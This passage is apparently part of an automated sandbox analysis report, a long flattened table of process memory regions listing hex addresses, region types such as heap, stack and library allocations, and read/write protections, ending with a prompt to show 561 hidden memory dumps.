|
page read and write
|
||
|
1E316F76000
|
trusted library allocation
|
page read and write
|
||
|
52839F7000
|
stack
|
page read and write
|
||
|
17D27F84000
|
heap
|
page read and write
|
||
|
234E6850000
|
trusted library allocation
|
page read and write
|
||
|
1E316F71000
|
trusted library allocation
|
page read and write
|
||
|
2E956179000
|
heap
|
page read and write
|
||
|
BE247D000
|
stack
|
page read and write
|
||
|
1E311A7A000
|
heap
|
page read and write
|
||
|
17D27F77000
|
heap
|
page read and write
|
||
|
1E316F75000
|
trusted library allocation
|
page read and write
|
||
|
1E311B02000
|
heap
|
page read and write
|
||
|
2E95AE20000
|
trusted library allocation
|
page read and write
|
||
|
1E311860000
|
heap
|
page read and write
|
||
|
914597E000
|
stack
|
page read and write
|
||
|
17D27F86000
|
heap
|
page read and write
|
||
|
2264EBB0000
|
heap
|
page read and write
|
||
|
1E317121000
|
heap
|
page read and write
|
||
|
1E31230C000
|
heap
|
page read and write
|
||
|
1E312B60000
|
trusted library section
|
page readonly
|
||
|
1F392670000
|
heap
|
page read and write
|
||
|
AF431FC000
|
stack
|
page read and write
|
||
|
17D275E0000
|
remote allocation
|
page read and write
|
||
|
2E95613F000
|
heap
|
page read and write
|
||
|
1E31706F000
|
heap
|
page read and write
|
||
|
1E3170F8000
|
heap
|
page read and write
|
||
|
1F39264E000
|
heap
|
page read and write
|
||
|
BE277A000
|
stack
|
page read and write
|
||
|
17D27F97000
|
heap
|
page read and write
|
||
|
17D27653000
|
heap
|
page read and write
|
||
|
17D27F90000
|
heap
|
page read and write
|
||
|
17D27F73000
|
heap
|
page read and write
|
||
|
1E312359000
|
heap
|
page read and write
|
||
|
2E957B40000
|
heap
|
page read and write
|
||
|
1E316F03000
|
trusted library allocation
|
page read and write
|
||
|
268E3855000
|
heap
|
page read and write
|
||
|
253945D7000
|
heap
|
page read and write
|
||
|
1E316F71000
|
trusted library allocation
|
page read and write
|
||
|
BE2577000
|
stack
|
page read and write
|
||
|
253944D0000
|
heap
|
page read and write
|
||
|
1E3173B0000
|
trusted library allocation
|
page read and write
|
||
|
234E667D000
|
heap
|
page read and write
|
||
|
1E31704C000
|
heap
|
page read and write
|
||
|
1E311A29000
|
heap
|
page read and write
|
||
|
1F39264A000
|
heap
|
page read and write
|
||
|
268E3870000
|
heap
|
page read and write
|
||
|
17D27F7E000
|
heap
|
page read and write
|
||
|
2474D64D000
|
heap
|
page read and write
|
||
|
234E6849000
|
heap
|
page read and write
|
||
|
1E311B26000
|
heap
|
page read and write
|
||
|
17D276F5000
|
heap
|
page read and write
|
||
|
1E317109000
|
heap
|
page read and write
|
||
|
17D27FAC000
|
heap
|
page read and write
|
||
|
1E317087000
|
heap
|
page read and write
|
||
|
1E311A95000
|
heap
|
page read and write
|
||
|
1E316F77000
|
trusted library allocation
|
page read and write
|
||
|
2474D652000
|
heap
|
page read and write
|
||
|
1E3170FE000
|
heap
|
page read and write
|
||
|
2E95628E000
|
heap
|
page read and write
|
||
|
1E317109000
|
heap
|
page read and write
|
There are 561 hidden memdumps, click here to show them.